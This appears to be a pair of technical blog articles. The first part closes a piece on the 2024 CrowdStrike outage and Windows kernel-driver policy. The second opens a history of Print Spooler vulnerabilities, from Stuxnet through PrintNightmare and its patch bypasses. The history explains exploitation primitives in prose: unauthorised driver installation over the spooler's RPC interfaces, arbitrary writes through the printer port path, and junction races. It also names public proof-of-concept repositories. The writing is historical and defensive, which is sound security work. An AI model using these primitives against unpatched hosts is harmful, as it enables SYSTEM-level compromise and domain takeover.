Six questions a careful reader will already have answered for themselves, restated here for the reader who arrived at this section via the table of contents.

No. Microsoft Windows behaved exactly as the kernel-driver architecture requires it to behave when a third-party kernel driver faults at elevated IRQL: the kernel had no way to recover, so it stopped. The bug was in CrowdStrike's `csagent.sys` driver consuming a malformed CrowdStrike Channel File. Microsoft's own July 27, 2024 security blog is unambiguous about this: the WinDBG walkthrough names `csagent.sys` as the faulting image and `nt!KiPageFault+0x369` as the kernel handler that received the fault [@ms-secblog-2024-07-27]. The architectural responsibility for the post-outage migration sits with Microsoft as the platform owner, but the proximate technical cause was a third-party kernel driver consuming a third-party content file [@cs-rca-2024-08-06]. Not necessarily. The user-mode EDR architecture closes the *reliability* problem -- a Channel-File-291-class bug in a vendor's content pipeline crashes the vendor's user-mode process, not the kernel. For the *coverage* gaps that user-mode loses on its own (direct syscalls, rootkit visibility, BYOVD detection), Microsoft is layering platform features below the user-mode EDR: hypervisor-assisted introspection via VBS and HVCI [@mslearn-hvci], the Vulnerable Driver Block List for BYOVD [@mslearn-driver-block-rules, @cisa-cm0058], and Defender as the baseline detection floor. Whether the combined stack reaches coverage equivalence with today's kernel-callback EDR is the article's central open question and the honest mid-2026 answer is that it is not yet settled [@weston-2025-06-26, @ms-nov-2025]. The strongest available public signal as of mid-2026 is the November 18, 2025 Microsoft Windows Experience Blog framing that *"AV enforcement"* (not *"third-party AV enforcement"*) is shifting from kernel to user mode -- by plain reading, that includes Defender for Endpoint [@ms-nov-2025]. No Defender-specific GA date for the user-mode migration has been published. The same November 18 post explicitly carves out graphics drivers, which continue to ship in kernel mode for performance reasons -- so the WRI is, narrowly, an AV-enforcement migration and not a wholesale third-party kernel-driver lockout [@ms-nov-2025]. Probably elevated, but no public primary source establishes the specific IRQL value. The article says only that the fault occurred at an interrupt request level high enough that the kernel could not unwind to a structured exception handler in any meaningful way. Treat any IRQL-specific claim about Channel File 291 from a third-party source as speculation unless they cite a primary source that publishes the value. Microsoft's own July 27, 2024 post-mortem reproduces the WinDBG dump but does not publish the IRQL value at the moment of the fault [@ms-secblog-2024-07-27]; neither does CrowdStrike's August 6, 2024 Root Cause Analysis [@cs-rca-2024-08-06]. No. The Microsoft response is squarely a U.S.-side platform-stewardship response to a U.S.-litigated incident. European regulatory frameworks were part of the policy backdrop, and U.S. federal frameworks (Government Accountability Office, Congressional Research Service, House Homeland Security Subcommittee) shaped the political environment [@gao-24-107733, @crs-if12717-everycrsreport, @homeland-hearing-page, @govinfo-chrg-118hhrg60030]. But the proximate political cause was the operational loss of 8.5 million Windows hosts and the Congressional accountability event that followed; no regulatory body mandated the WRI's specific architectural choices. Architecturally it is not different in any structural way. Both were vendor content updates that caused vendor kernel drivers to misbehave at fleet scale. McAfee DAT 5958 was a false positive on `svchost.exe` that triggered the McAfee kernel driver to quarantine the system file, putting Windows XP SP3 fleets into reboot loops [@uscert-mcafee-2010, @sans-isc-8656, @askperf-mcafee]. CrowdStrike Channel File 291 was a parameter-count mismatch that triggered the CrowdStrike kernel driver to dereference an unmapped address, producing `PAGE_FAULT_IN_NONPAGED_AREA` [@cs-rca-2024-08-06]. The differences were the *scale* of the 2024 event (8.5 million Windows hosts versus a far smaller XP fleet in 2010) and the *cost calculus* -- by 2024, fourteen years of recurring kernel-driver-bricks-fleet incidents had raised the political cost of doing nothing past the point where Microsoft could be politically attacked for taking action [@three-buddy-ep5].

The seventy-eight-minute window of July 19, 2024 collapsed twenty years of political resistance to the Vista-era idea that vendor-authored kernel-mode code is a fleet-scale reliability liability, and accelerated Microsoft's Windows Resiliency Initiative into a multi-year, partner-coordinated migration that puts third-party endpoint security where Apple put it in 2019 [@apple-esf-docs] and where Microsoft itself had been quietly building the platform pieces since at least 2021 [@msft-ebpf-windows, @mslearn-hvci]. The 8.5 million figure from Brad Smith's morning-after blog post [@ms-bradsmith-2024-07-20] is the empirical anchor that supplied the political license; the Toulouse 2006 quote "either everybody has access to the kernel, or nobody does" [@informationweek-2006-toulouse] is the historical anchor that supplied the architectural answer; the Ionescu pivot of April 3, 2025 [@cs-ionescu-ctio-2025-04-03] is the political anchor that demonstrated the answer would not be fought.

Whether user-mode EDR with hypervisor-assisted memory introspection can deliver the coverage equivalence that twenty-five years of kernel-mode hooking has built is the next decade's research problem, and the honest mid-2026 answer is we do not yet know. The macOS seven-year ESF deployment supplies the strongest available yes evidence; the not-yet-stress-tested MVI 3.0 rings supply the strongest available not-yet-discriminated evidence; the BYOVD enforcement gap that no public source quantifies supplies the strongest available honest concern [@cisa-cm0058].

Key idea: July 19, 2024 did not invent the architecture; it provided the political license for an architecture two other operating systems had already validated. The next several years will tell us whether the architecture, transplanted to Windows under the WRI, reaches feature equivalence with the kernel-mode hooking it replaces, or whether the equivalence question is the wrong question and the right question is whether the platform features layered below the user-mode broker close enough of the coverage gap. The honest answer mid-2026 is that the question is genuinely open, and the next public evidence -- the first MVI 3.0 ring stop-gate event, the first Defender-kernel-out GA, the first quantified HVCI enablement statistic -- is the evidence to watch for.

Companion articles in this series cover the substrate pieces in more depth: EDR/Sysmon as the canonical user-mode consumer of kernel ETW telemetry [@mslearn-sysmon]; Vulnerable Driver Block List as Microsoft's BYOVD platform mitigation; Process Mitigation Policies and Defender for Endpoint baselines; and Event Tracing for Windows as the cross-cutting platform observability substrate.

Picture the release engineer at the CrowdStrike Falcon Cloud rollout console at 04:09 UTC on a Friday morning in July 2024, watching the deployment indicator go from staging to production for Channel File 291, with no idea that the seventy-eight-minute window about to open would be the most consequential window in twenty-five years of Windows security architecture. The engineer did everything right; the architecture, on that morning, did exactly what twenty-five years of decisions had configured it to do; and the next two years of Microsoft platform engineering, vendor-side rewrites, and political alignment exist to make sure that the next time something similar happens, it does not look like that.

Three Years of PrintNightmare: How the Oldest Windows Service Survived Four Patch Waves

noreply@paragmali.com (Parag Mali) — Tue, 02 Jun 2026 00:00:00 GMT

Between June 2021 and August 2024, Microsoft patched the Windows Print Spooler four times for what the press collectively called PrintNightmare. The patches did not converge. Each wave revealed the last one as a behavior restriction rather than an architectural change. By October 2024 Microsoft had shipped two parallel architectural answers: Windows Protected Print Mode (WPP), an opt-in driverless local stack with a lower-privilege Spooler Worker process; and Universal Print, a cloud-hosted replacement. Two answers, because the local SYSTEM-context driver-loading primitive the spooler was built around in the early 1990s cannot be sandboxed without breaking the printer install base that depends on it. This article traces nine related Spooler EoP and RCE primitives from 2010 to 2024, the architectural concession that ended the patch cycle, and why no single 2026 configuration is the full answer.

1. June 29, 2021: The Repository That Should Not Have Existed

On June 29, 2021, three researchers from Sangfor Technology -- Zhiniang Peng, Xuefeng Li, and Lewis Lee -- pushed a GitHub repository named afwu/PrintNightmare containing a working proof-of-concept exploit against the Windows Print Spooler service. The repository had been prepared for their upcoming Black Hat USA 2021 briefing, "Diving Into Spooler: Discovering LPE and RCE Vulnerabilities in Windows Printer" [@infocondb-bh2021-sangfor]. The team believed Microsoft's June 8 Patch Tuesday update had fixed the vulnerability they were about to demonstrate.

Within hours the repository was deleted. By then it had already been mirrored on multiple GitHub accounts and was spreading [@hackernews-printnightmare-poc-leak]. By the end of the day, the internet had a new name for the bug class: PrintNightmare. And by the end of the week, Microsoft, CERT/CC, and CISA had each independently confirmed what the Sangfor team realized about an hour after the deletion: the June 8 patch did not actually fix the vulnerability they had reported, and now the world had a working exploit for it [@cert-vu-383432] [@bleepingcomputer-domain-takeover].

The Wayback Machine preserves the original README. Below the technical description, the Sangfor team explained why they had thought it was safe to publish: Microsoft's June 8 advisory had marked CVE-2021-1675 as a local "Privilege Escalation" with a CVSS v3.1 base score of 7.8 [@nvd-cve-2021-1675]. The bug Sangfor had separately reported and analyzed was, they believed, a different bug -- a remote code execution against the same service. They were correct. Nobody knew it yet.Microsoft silently reclassified CVE-2021-1675 from "Elevation of Privilege" to "Remote Code Execution" on June 21, 2021, after community analysis demonstrated the remote primitive. The reclassification appears in the NVD entry's revision history [@nvd-cve-2021-1675] and was reported the same week by BleepingComputer [@bleepingcomputer-domain-takeover]. The Sangfor team's confusion was reasonable: the advisory they were reading on June 28 still said EoP.

The README's most striking line is an apology. "CVE-2021-1675 is a remote code execution in Windows Print Spooler," it begins. Then, two paragraphs in: "We also found this bug before and hope to keep it secret to participate Tianfu Cup" [@afwu-wayback-snapshot]. The Sangfor team had discovered the same primitive months earlier, planned to use it for the Tianfu Cup capture-the-flag prize money, and reasoned that Microsoft's June 8 patch had now closed it.The Tianfu Cup is a Chinese-government-organized exploit competition. Chinese researchers are restricted from foreign competitions like Pwn2Own by a 2018 directive and instead route their work through Tianfu. Holding a bug secret to maximize Tianfu prize money is a known practice; what is unusual here is the public admission of the practice in an apology README.

The rest of this article is about two questions. First: why does a single Windows service produce, on the public record, nine independently classed SYSTEM-code-execution primitives across fifteen years? Second: why does the answer Microsoft eventually shipped in 2024 take the form of two parallel architectures rather than one patch? We will not tell you which configuration to deploy. We will tell you why neither one alone is the full answer, and why that is the only honest place to land.

To understand why one Windows service can leak a SYSTEM-execution primitive to anyone who can reach an RPC named pipe on a domain controller, we have to understand what the service is for.

2. The Artifact: What `spoolsv.exe` Is and Why It Was Built This Way

The Windows Print Spooler service has been part of Windows continuously since the Windows NT era of the early 1990s.The "Windows NT 3.1, July 1993" attribution often cited for the first Print Spooler service is folk knowledge. Microsoft's own Learn documentation anchors the spooler architecture to "Microsoft Windows 2000 and later" [@ms-print-spooler-architecture], and the Windows Internals team writes that the spooler is "largely unchanged since Windows NT 4" [@windows-internals-printdemon]. The early-1990s framing is the safe one. Same name today (spoolsv.exe), same security context (LocalSystem), same RPC interface family, same in-process third-party DLLs (Print Providers, Print Processors, driver components). The interesting question is not why the spooler still has bugs. It is why a service designed before AppContainer, before Mandatory Integrity Control, before AMSI, before Driver Signature Enforcement -- before the entire modern Windows security architecture existed -- still occupies the same SYSTEM-context process slot it did in 1996.

2.1 Anatomy

spoolsv.exe is, in Microsoft's own words, "the spooler's API server" [@ms-intro-spooler-components]. The Service Control Manager starts it at boot under the LocalSystem account. Inside the process, the router DLL spoolss.dll dispatches incoming API calls to one of three Print Provider DLLs [@ms-print-spooler-architecture].

The Windows service that mediates between print clients and printer drivers. It runs continuously as LocalSystem, exposes an RPC interface over the `\PIPE\spoolss` named pipe, and loads third-party Print Provider, Print Processor, and printer driver DLLs into its address space [@ms-intro-spooler-components]. Almost every named Print Spooler vulnerability since 2010 has cashed out as SYSTEM-context code execution inside this process.

The three Print Providers handle three kinds of printer connections. The Local Print Provider localspl.dll handles printers attached or shared on the local machine. The Remote Print Provider win32spl.dll handles printers reached via Windows networking. The HTTP / IPP Print Provider inetpp.dll handles printers exposed over the Internet Printing Protocol [@ms-print-spooler-architecture] [@ms-intro-spooler-components].

The three router-loaded DLLs that dispatch print operations to the appropriate transport. `localspl.dll` (Local Print Provider) handles local and SMB-shared printers; `win32spl.dll` (Remote Print Provider) handles Windows-network remote printers; `inetpp.dll` (HTTP / IPP Print Provider) handles IPP printers reached over HTTP [@ms-print-spooler-architecture]. The chain is often confused with the Print Processor layer (a different layer entirely; see below).

Once a print job is accepted, a separate component decides how to render it. That component is the Print Processor. The default Print Processor is winprint.dll. It is a sibling layer to the Print Providers, not a member of the chain.

The component that interprets the spool file format (EMF, XPS, RAW, TEXT) and renders pages for a specific printer. `winprint.dll` is the default Print Processor that ships with Windows. Vendor-supplied Print Processors can be installed alongside it. A common pre-research misclassification names `winprint.dll` as a Print Provider; it is not. The Print Providers handle which printer; the Print Processor handles how to render the page [@ms-print-spooler-architecture].

Clients of spoolsv.exe are winspool.drv locally and win32spl.dll remotely [@ms-intro-spooler-components]. A user-mode application that calls a Win32 print API (OpenPrinter, EnumPrinters, AddPrinter, AddPrinterDriverEx) is, under the covers, sending an RPC request to spoolsv.exe through one of these client libraries.

flowchart TD SCM["Service Control Manager"] --> SPOOLSV["spoolsv.exe
LocalSystem"] SPOOLSV --> ROUTER["spoolss.dll
(router)"] ROUTER --> LOCALSPL["localspl.dll
Local Print Provider"] ROUTER --> WIN32SPL["win32spl.dll
Remote Print Provider"] ROUTER --> INETPP["inetpp.dll
HTTP / IPP Print Provider"] ROUTER --> WINPRINT["winprint.dll
Print Processor"] PIPE["\PIPE\spoolss
(named pipe / ncacn_np)"] --> SPOOLSV WINSPOOL["winspool.drv
local clients"] --> PIPE REMOTE["win32spl.dll
remote clients"] --> PIPE SPOOLSV -. opt-in INF .-> PIH["PrintIsolationHost.exe
(sibling, LocalSystem)"] PIH --> VDRIVER["vendor driver DLLs"]

2.2 The RPC Surface

The Print Spooler exposes two RPC interface families. MS-RPRN is the synchronous Print System Remote Protocol. MS-PAR is its asynchronous counterpart. Both bind to the same named pipe.

Microsoft's two open-specification RPC protocols for remote print management. MS-RPRN is synchronous; MS-PAR is asynchronous. The MS-RPRN specification states that "The RPC Protocol Sequence MUST be `ncacn_np`. The RPC Protocol Sequence Endpoint MUST be `\PIPE\spoolss`" [@ms-rprn-spec]. Both interfaces expose driver-installation entry points: `RpcAddPrinterDriverEx` in MS-RPRN [@ms-rprn-rpcaddprinterdriverex] and `RpcAsyncAddPrinterDriver` in MS-PAR [@ms-par-rpcasyncaddprinterdriver]. MS-PAR's documentation states verbatim that the latter is "The counterpart of this method in the Print System Remote Protocol."

Two symmetric entry points are the architectural seed of the entire PrintNightmare patch tree. RpcAddPrinterDriverEx (MS-RPRN section 3.1.4.4.8, Opnum 89) "installs a printer driver on the print server" [@ms-rprn-rpcaddprinterdriverex]. RpcAsyncAddPrinterDriver (MS-PAR section 3.1.4.1, Opnum 39) does the same thing through the asynchronous interface [@ms-par-rpcasyncaddprinterdriver]. When the June 8, 2021 patch tightened access checks on the first entry point, the second one remained as the obvious next bypass target. We will come back to this.

The authentication boundary is the part most worth dwelling on, because the answer is structurally surprising. MS-RPRN does no authentication at the protocol layer. The MS-RPRN Transport section states this verbatim: "The client MUST use no authentication, and the server MUST accept connections without authentication" [@ms-rprn-transport]. The initialization section adds that the binding handle "MUST specify an ImpersonationLevel of 2 (Impersonation)" against the SMB2 transport [@ms-rprn-initialization]. The RPC layer trusts whatever caller identity SMB hands it.

This means the practical authentication boundary on \PIPE\spoolss is the SMB named-pipe access control surface, not the RPC server. Two security policy settings govern that surface. The first, Network access: Restrict anonymous access to Named Pipes and Shares (the RestrictNullSessAccess registry value under HKLM\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters), has shipped at value 1 -- enforced -- by default since Windows Vista; its effective default is "Enabled" on stand-alone servers, domain controllers, member servers, and client computers [@ms-restrict-anonymous-named-pipes]. The second, Network access: Named Pipes that can be accessed anonymously (the NullSessionPipes list), enumerates the small set of pipes that an unauthenticated caller is allowed to touch even when the first policy is enforced. spoolss is not on the default NullSessionPipes list [@ms-named-pipes-anonymous].The combination of these two settings is what makes a default modern Windows host immune to anonymous-SMB reachability of \PIPE\spoolss. The MS-RPRN spec's "MUST use no authentication" sentence [@ms-rprn-transport] reads like a security failure in isolation; combined with RestrictNullSessAccess=1 and the absence of spoolss from NullSessionPipes [@ms-restrict-anonymous-named-pipes] [@ms-named-pipes-anonymous], it becomes a deliberate division of labour: RPC does not authenticate; SMB does. The architectural cost is that the boundary is administered through two settings on a different policy surface than the spooler itself.

On a default Windows 11 24H2 host with the Print Spooler running, then: an unauthenticated remote attacker on the network cannot reach \PIPE\spoolss. A domain user authenticated to the same Active Directory forest can. That is the practical reachability boundary that CERT/CC and CISA had in mind when they called PrintNightmare a "domain takeover" primitive [@bleepingcomputer-domain-takeover] [@cisa-ed-21-04]: any domain user reaches the spooler on a domain controller; the spooler executes attacker-supplied code as LocalSystem; that LocalSystem code now runs on a host that owns the domain. The "domain user can reach it" half is true because SMB authenticates the user and the RPC layer accepts whatever SMB says; the "executes attacker-supplied code as LocalSystem" half is the architectural primitive section 2.3 will name.

2.3 The Back-Compat Constraint

Why has the architecture not been replaced? Because essentially every Windows-compatible printer manufactured since 1993 ships a third-party driver DLL that expects to be loaded into spoolsv.exe as LocalSystem.

The v3 driver model -- introduced with Windows 2000 -- loads driver render code into the spooler process by default [@ms-print-spooler-architecture]. The v4 driver model, introduced with Windows 8, was a simpler XPS-based alternative meant to package drivers in a way that worked across multiple Windows form factors [@ms-print-spooler-architecture]. It did not replace v3. The two coexisted for more than a decade. The IPP class driver [@ms-modern-print-platform], which lets Windows print to any Mopria-certified printer without any vendor-specific driver at all, was not even an option for the first twenty years of the spooler's life [@mopria-certified-products].

What this means in practice: the installed base of printers in 2021 was overwhelmingly v3 drivers, signed by vendors, packaged for LocalSystem load. A naive "sandbox the spooler" change that broke that loading model would break printing for every one of those printers. Microsoft has spent twenty years trying not to make printing not work. That constraint is the protagonist of the rest of the article.

2.4 Point and Print and Why It Is Its Own Constraint

Point and Print is the SMB-fetch-and-install-driver-on-print behavior introduced with Windows NT 4.0. When a client first prints to a shared printer, the spooler downloads the driver package from the print server and installs it locally. The user does not have to be an administrator.

A Windows print-client behavior in which a non-administrator user, on first use of a shared printer, causes their machine's spooler to download and install the printer's driver package from the print server. Two Group Policy registry values govern whether the user is warned and whether elevation is suppressed: `NoWarningNoElevationOnInstall` (suppress install-time elevation) and `NoWarningNoElevationOnUpdate` (suppress update-time elevation) [@kb-5005010-topic] [@kb-5005652-topic]. The Microsoft-supplied "fix" to this design surface is a third registry value, `RestrictDriverInstallationToAdministrators`, which overrides both.

Bake "any authenticated user can cause a driver DLL to be downloaded and registered" into a protocol and you have, by construction, a low-privilege code-installation path. The two relevant Group Policy levers (NoWarningNoElevationOnInstall and NoWarningNoElevationOnUpdate) and the registry override (RestrictDriverInstallationToAdministrators) all existed before PrintNightmare. All three defaulted to the permissive position. The June 2021 disclosure made the permissive defaults visible.

Key idea: Three of the four Print Spooler design choices -- LocalSystem context, third-party DLL loading, and a low-privilege RPC entry point -- form the architectural primitive. The rest of this article is the story of what happens when the security community discovers, again and again, that any single primitive of that shape produces a SYSTEM-execution bug by construction.

3. Pre-history: Stuxnet, PrintDemon, and the Bug Class That Already Had a Decade Behind It

PrintNightmare is the name the press gave to a 2021 disclosure event. The bug class behind that event is older. The first weaponized Print Spooler privilege-escalation primitive in the public record is from 2010, and it is famous. It was one of the four zero-days Stuxnet chained to reach centrifuge controllers in Natanz.

3.1 CVE-2010-2729 (Stuxnet, MS10-061)

In September 2010, Microsoft shipped MS10-061 to patch a Print Spooler Service Impersonation Vulnerability that "could allow remote code execution if an attacker sends a specially crafted print request to a vulnerable system that has a print spooler interface exposed over RPC" [@ms-bulletin-ms10-061]. The NVD entry classifies it as a CWE-20 Improper Input Validation in the Print Spooler service that, "when printer sharing is enabled, does not properly validate spooler access permissions" [@nvd-cve-2010-2729]. NVD records publication on September 15, 2010 [@nvd-cve-2010-2729].

The Symantec dossier on Stuxnet [@symantec-stuxnet-dossier-broadcom] is the canonical technical history of the Iran-Natanz campaign and is out of scope here. What matters for the Print Spooler story is the architectural pattern Stuxnet's operators noticed. A low-privilege caller could reach a SYSTEM-context RPC service, get the service to do something on the caller's behalf (write a file, load a DLL, validate a credential), and turn that operation into SYSTEM-context code execution. That pattern is the same one every later PrintNightmare-family bug exploits. The 2010 case is not the first instance of the pattern in Windows. It is the first instance of the pattern in the Windows Print Spooler in the public record.

3.2 CVE-2020-1048 (PrintDemon, May 2020)

Ten years later, in May 2020, two independent research teams published essentially the same Print Spooler bug. Peleg Hadar and Tomer Bar at SafeBreach Labs presented their work at DEF CON Safe Mode 2020 [@defcon-28-hadar-bar-pdf]. Yarden Shafir and Alex Ionescu at Windows Internals wrote it up under the name PrintDemon [@windows-internals-printdemon].The co-discovery pattern is the norm for high-value Windows-internals research. Two well-resourced teams looked at the same architectural primitive and arrived at the same vulnerability within weeks of each other. The May 2020 Microsoft Security Response Center acknowledgments credit both groups. The vulnerability was assigned CVE-2020-1048.

The mechanism: spoolsv.exe accepts a Win32 print API call to set a printer port. The port string can be a file path. The spooler, running as LocalSystem, then writes spool data to that file path. A low-privilege user can therefore cause SYSTEM-context arbitrary writes to anywhere on the filesystem. NVD classifies the bug as CWE-669 Incorrect Resource Transfer Between Spheres [@nvd-cve-2020-1048].

The Shafir-Ionescu writeup is the source of the line that most concisely captures the spooler's long arc:

The Print Spooler continues to be one of the oldest Windows components that still has not gotten much scrutiny, even though it is largely unchanged since Windows NT 4, and was even famously abused by Stuxnet. -- Yarden Shafir and Alex Ionescu, May 2020 [@windows-internals-printdemon]

3.3 CVE-2020-1337 (PrintDemon Redux, August 2020)

Microsoft patched CVE-2020-1048 on May 12, 2020. Three months later, on August 11, 2020 Patch Tuesday, Microsoft patched CVE-2020-1337. Paolo Stagno (VoidSec) had demonstrated that the May patch was bypassable through an NTFS junction race [@voidsec-cve-2020-1337]. NVD classes the bypass as a CWE-367 TOCTOU [@nvd-cve-2020-1337].

The mechanism is the canonical pattern for path-validation patches. Microsoft's May fix resolved the printer port file path, validated it as benign, then re-resolved it during the actual spool write. Between check and use, a non-administrator could substitute a reparse point that redirected the write to a SYSTEM-writable target. The patch had moved the security check; the architectural primitive (SYSTEM-context filesystem operation on a caller-controlled path) was unchanged.

The detail to file away: the exact same primitive, NTFS reparse points racing a spooler-side resolve-validate-use sequence, would resurface eighteen months later in SpoolFool. Same primitive, different entry point.

3.4 The Pattern Nobody Had Yet Named

Three independent research efforts (the Microsoft analysis post-Stuxnet, the SafeBreach and Windows Internals work in 2020, the Sangfor work that would surface in 2021) each rediscovered variants of the same architectural primitive. The frustration the §1 hook left implicit is now nameable. The security community had documented this primitive twice before PrintNightmare became a news event.

Will Dormann's CERT/CC advisory VU#383432 (issued June 30, 2021) was not, strictly speaking, about the bug. It was about the disclosure-norms failure that turned an internal bug into an internet-mirrored zero-day inside twenty-four hours. Dormann wrote in plain language:

CVE-2021-34527 is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in `RpcAddPrinterDriverEx()`. The attack vector is different as well. -- Will Dormann, CERT/CC VU#383432, June 30, 2021 [@cert-vu-383432]

The sentence is unusual for a CERT advisory because it concedes mid-disclosure that the June 8 patch had named one CVE and the public exploits were targeting another. CERT/CC's explicit "does NOT protect" framing -- which we quote verbatim in section 4.1 at the point in the patch-cascade narrative where it lands hardest -- followed in the same advisory and made the gap unmistakable.

PrintNightmare is not the name of a CVE. It is the name a panic gave, in the last week of June 2021, to a class of Print Spooler EoP and RCE primitives that had already been exploited in production eleven years earlier and rediscovered by independent researchers fourteen months earlier. The 2021 event made the class famous. It did not invent the class.

The next section is what happened when Microsoft and the security community spent three years trying to patch the class out of existence one entry point at a time.

4. The Patch Cascade: Four Generations of PrintNightmare

Between June 8, 2021, and August 13, 2024, Microsoft shipped four named patch waves targeting the PrintNightmare bug class. None of the first three converged. The fourth was issued for an unrelated-looking CVE (CVE-2024-38198) that turned out to be exploitable against a primitive the September 2021 wave had already documented as residual.

The Mermaid gantt below sets the spine of the timeline. It runs from Stuxnet through the announced third-party-driver end-of-servicing milestones in 2027. Every later subsection of this article maps to a bar in this chart.

gantt title Print Spooler hardening timeline 2010-2027 dateFormat YYYY-MM-DD axisFormat %Y section Bugs CVE-2010-2729 Stuxnet :crit, 2010-09-15, 60d CVE-2020-1048 PrintDemon :crit, 2020-05-12, 60d CVE-2020-1337 PrintDemon redux :crit, 2020-08-11, 60d CVE-2021-1675 :crit, 2021-06-08, 30d CVE-2021-34527 PrintNightmare :crit, 2021-07-01, 30d CVE-2021-34481 :crit, 2021-07-15, 30d CVE-2021-36958 :crit, 2021-09-14, 30d CVE-2022-21999 SpoolFool :crit, 2022-02-08, 30d CVE-2024-38198 :crit, 2024-08-13, 30d section Patches MS10-061 :active, 2010-09-14, 30d KB5004945 emergency :active, 2021-07-06, 30d KB5005010 default flip :active, 2021-08-10, 30d KB5005652 policy rewrite :active, 2021-09-14, 30d SpoolFool fix :active, 2022-02-08, 30d Redirection Guard :active, 2023-12-01, 60d section Architecture WPP announced :done, 2023-12-13, 30d WPP ships opt-in 24H2 :done, 2024-10-01, 30d No new 3p drivers WU :2026-01-15, 30d IPP class preferred :2026-07-01, 30d 3p driver servicing ends :2027-07-01, 30d

4.1 Generation 1: The June 8 Patch and the Sangfor Disclosure Failure

On June 8, 2021 Patch Tuesday, Microsoft fixed CVE-2021-1675, a Windows Print Spooler Elevation of Privilege Vulnerability rated CVSS v3.1 7.8 local EoP [@nvd-cve-2021-1675]. The fix added an authorization check to RpcAddPrinterDriverEx (MS-RPRN section 3.1.4.4.8) so that a low-privilege user could no longer install an arbitrary printer driver into the spooler process via that synchronous entry point [@ms-rprn-rpcaddprinterdriverex]. Microsoft credited Zhipeng Huo (Tencent Security Xuanwu Lab), Piotr Madej (AFINE), and Yunhai Zhang (NSFOCUS Security Team), as recorded in the Wayback snapshot of the Sangfor README [@afwu-wayback-snapshot]. Three reporters. No Victor Mata. Mata enters this story later, in section 4.3.

On June 21, 2021, Microsoft silently reclassified CVE-2021-1675 from EoP to RCE [@nvd-cve-2021-1675]. BleepingComputer's June 30 article documents the reclassification and the subsequent confusion it caused [@bleepingcomputer-domain-takeover]. The Sangfor team had been working from the June 8 advisory's EoP framing; by the time they noticed the reclassification, their PoC was already mirrored across the internet.

The chaos compressed into seventy-two hours. June 29: Sangfor pushes afwu/PrintNightmare, then deletes the repository on realizing the RCE was unpatched. June 30: public mirrors propagate across multiple GitHub accounts; CERT/CC publishes VU#383432 [@cert-vu-383432]; Sergiu Gatlan files the BleepingComputer "domain takeover" story [@bleepingcomputer-domain-takeover]. July 1: Microsoft assigns CVE-2021-34527 as a separate-bulletin entity covering the unpatched RCE primitive [@nvd-cve-2021-34527] [@msrc-cve-2021-34527]. CERT/CC documents the CVE pair as "similar but distinct" with the qualifier that "the attack vector is different as well" [@cert-vu-383432]. They are not the same bug; the new CVE is not simply the "remote" version of the old one.

This update does NOT protect against public exploits that may refer to PrintNightmare or CVE-2021-1675. -- Will Dormann, CERT/CC VU#383432 [@cert-vu-383432]

CERT/CC's only available mitigation, in the window between July 1 and the emergency patch, was to stop and disable the Spooler service entirely [@cert-vu-383432]. The runnable block below models the PowerShell logic in JavaScript (the blog runtime supports JS, not PowerShell). The semantics are the same: turn the service off, verify it stays off across reboot.

{// Original PowerShell from CERT/CC VU#383432: // Stop-Service -Name Spooler -Force // Set-Service -Name Spooler -StartupType Disabled // Get-Service -Name Spooler // // The probe below models the resulting state machine so you can // see what "safe" looks like for a domain controller under CISA // Emergency Directive 21-04. const spoolerState = { status: 'Stopped', startupType: 'Disabled' }; const isCertSafe = spoolerState.status === 'Stopped' && spoolerState.startupType === 'Disabled'; console.log(isCertSafe ? 'OK: spooler stopped and disabled (CERT/CC mitigation in force)' : 'WARN: spooler running or set to auto-start (vulnerable surface present)');}

On July 6 and July 7, 2021, Microsoft shipped KB5004945 out-of-band. The NVD entry for CVE-2021-34527 records both shipping dates verbatim: "UPDATE July 7, 2021: The security update for Windows Server 2012, Windows Server 2016 and Windows 10, Version 1607 have been released" [@nvd-cve-2021-34527]. KB5004945's summary line is unambiguous: "Updates a remote code execution exploit in the Windows Print Spooler service, known as PrintNightmare, as documented in CVE-2021-34527" [@kb-5004945-help].KB5004945's SKU fan-out was unusually wide. Microsoft shipped the patch for Windows 10 across multiple feature updates, for Windows 11 (just-released at the time), for Windows Server 2016/2019/2022, and for ESU-only SKUs back through Windows 7 SP1 and Windows Server 2008 R2 [@kb-5004945-help]. The fan-out signals how broadly the vulnerable surface had spread across the supported install base, which is most of the reason the press could describe the bug as fleet-wide.

The patch had two parts. The first closed the immediate RCE. The second added a new Group Policy registry value: RestrictDriverInstallationToAdministrators. KB5004945 shipped this value as OFF by default. KB5005010 (released August 10, 2021) records the timeline of the default flip verbatim: "Updates released July 6, 2021 or later have a default of 0 (disabled) until updates released August 10, 2021. Updates released August 10, 2021 or later have a default of 1 (enabled)" [@kb-5005010-topic].

The patch had a switch. The switch was off by default. The press named the bug PrintNightmare. By the end of the first week, the patch had not, in practice, been applied to most of the installed base.

4.2 Generation 2: `@cube0x0`, MS-PAR, and the Asynchronous-Variant Patch Bypass

After KB5004945 closed the synchronous RpcAddPrinterDriverEx entry point on MS-RPRN, a researcher under the handle @cube0x0 updated his repository to target the symmetric asynchronous entry point in MS-PAR. Different protocol family. Same primitive. No patch.

RpcAsyncAddPrinterDriver (MS-PAR section 3.1.4.1, Opnum 39) is, in Microsoft's own words, "The counterpart of this method in the Print System Remote Protocol" [@ms-par-rpcasyncaddprinterdriver]. CERT/CC's updated VU#383432 names the bypass explicitly:

While original exploit code relied on the `RpcAddPrinterDriverEx` to achieve code execution, an updated version of the exploit uses `RpcAsyncAddPrinterDriver` to achieve the same goal. -- Will Dormann, CERT/CC VU#383432 update [@cert-vu-383432]

The @cube0x0 GitHub repository carries the artifact of the rename-mid-disclosure chaos in its very name. The repository is called cube0x0/CVE-2021-1675. The vulnerability it actually exploits is CVE-2021-34527. The README's first paragraph clarifies: "Impacket implementation of the PrintNightmare PoC originally created by Zhiniang Peng (@edwardzpeng) and Xuefeng Li (@lxf02942370). Tested on a fully patched 2019 Domain Controller" [@cube0x0-cve-2021-1675].The repository-name-versus-CVE mismatch is a small artifact of the disclosure chaos, but it caused real downstream confusion. Detection rule authors had to handle both names. SigmaHQ's Zeek-on-the-wire rule for the wire-level driver-install primitive lists both RpcAddPrinterDriverEx and RpcAsyncAddPrinterDriver precisely because the entry point split between the two CVEs [@sigma-cve-2021-1675-zeek].

The July 6 emergency patch (KB5004945) added the access check to MS-PAR's RpcAsyncAddPrinterDriver in addition to MS-RPRN's RpcAddPrinterDriverEx. Microsoft's NVD entry for CVE-2021-34527 records the residual configuration risk verbatim:

Note: "Having NoWarningNoElevationOnInstall set to 1 makes your system vulnerable by design." -- Microsoft, NVD entry for CVE-2021-34527 [@nvd-cve-2021-34527]

